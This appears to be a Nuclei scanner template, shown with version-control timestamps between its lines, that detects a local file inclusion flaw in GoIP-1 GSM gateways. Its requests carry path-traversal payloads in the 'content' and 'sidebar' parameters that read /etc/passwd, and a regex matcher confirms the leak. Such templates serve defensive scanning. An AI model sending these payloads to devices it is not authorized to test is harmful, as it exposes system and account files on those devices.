2022-02-18 12:33:17 +00:00
id : goip-1-lfi
info :
name : GoIP-1 GSM - Local File Inclusion
author : gy741
severity : high
2022-04-22 10:38:41 +00:00
description : Input passed thru the 'content' or 'sidebar' GET parameter in 'frame.html' or 'frame.A100.html' not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker
to read arbitrary files on the affected system.
2022-02-18 12:33:17 +00:00
reference :
2022-02-22 06:08:07 +00:00
- https://shufflingbytes.com/posts/hacking-goip-gsm-gateway/
- http://www.hybertone.com/uploadfile/download/20140304125509964.pdf
- http://en.dbltek.com/latestfirmwares.html
2022-02-25 11:58:47 +00:00
tags : gsm,goip,lfi,iot
2022-02-18 12:33:17 +00:00
requests :
- method : GET
path :
2022-02-25 11:58:47 +00:00
- "{{BaseURL}}/default/en_US/frame.html?content=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
- "{{BaseURL}}/default/en_US/frame.A100.html?sidebar=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
2022-02-18 12:33:17 +00:00
matchers :
- type : regex
regex :
- "root:.*:0:0:"